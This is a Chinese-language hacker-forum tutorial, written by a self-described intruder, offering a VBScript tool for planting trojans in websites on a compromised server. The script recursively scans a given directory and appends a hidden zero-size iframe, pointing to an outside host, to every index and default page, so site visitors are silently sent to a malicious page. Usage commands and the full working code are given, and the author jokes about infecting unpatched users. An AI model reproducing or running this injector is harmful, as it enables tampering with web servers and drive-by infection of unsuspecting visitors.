好不容易才得到一台肉鸡,在保住肉鸡的同时还不免要扩大自己的成果。挂马其实是一个不错的选择,还有很多比我们菜的菜鸟还不懂打补丁呢(嘻嘻……)!前天下载了个批量挂马程序看了下200多K,想放在肉鸡上测试一下,好不容易才上传到肉鸡上不知怎么,运行的时候弹出个错误窗口肉鸡就挂了(真是悲哀………)!于是就想自己用脚本写个,个子小又有安全感!(Socket:下次进一个网站估计要中几十次木马了。)
主要功能:遍历目录,寻找符合条件的文件把马写进去。
下面的是代码,只要把代码copy到文件里另存为scan.vbe在cmd下运行。
cscript scan.vbe 要挂马的目录
例:cscript scan.vbe D:\
'版权信息
br="************************************" & vbCrLf
br=br & "* VBS 批量挂马脚本 *" & vbCrLf
br=br & "* BY BanLG *" & vbCrLf
br=br & "************************************" & vbCrLf & vbCrLf
br=br & "cscript scan.vbe D:\" & vbCrLf
'马的地址
ma="</Script><IfRAME height=0 width=0 sRc=" & chr(34) & "http://www.hacker.com.cn" & chr(34) & "></IFrAME>"
'要挂马的页面如果嫌不够还可以自己再加,记得要用”|”隔开
MyString="index.asp|index.html|index.htm|default.asp|default.html|default.htm"
'以"|"为分隔符拆分成数组
MyArray = Split(MyString, "|", -1, 1)
web=WScript.Arguments(0)
'如果web为空退出脚本
if web="" then
Wscript.echo (br)
window.Close
end if
Wscript.echo (br) & "马的地址:" & ma & vbCrLf & vbCrLf
'创建对象
Set fso = createObject("Scripting.FileSystemObject")
'开始扫描挂马
scan(web)
'scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾
sub scan(filesder)
set filesder=fso.getfolder(filesder)
'得到当前目录的所有文件集合
set files=filesder.files
'获取文件名
for each fext in files
Set file1 = fso.GetFile(fext)
filesext=file1.Name
'把文件名转换成小写字母
ext=lcase(filesext)
For Each index in MyArray
'判断文件是不是我们在MyString里限定的文件,如果是就写马
if ext=lcase(index) then
Set ts = fso.OpenTextFile(fext,8) '打开文件并在文件末尾进行写操作
ts.WriteLine(ma)
ts.Close
echo=""
echo=fext & " .............ok"
Wscript.echo (echo)
end if
next
next
set subfolders=filesder.subfolders
for each subfolder in subfolders '搜索其他目录,递归调用
scan(subfolder)
next
end sub
下面是我在本地测试的。
如果看不懂脚本可以参考下“VBScript 用户手册”,有什么问题可以到黑防论坛讨论,期待共同进步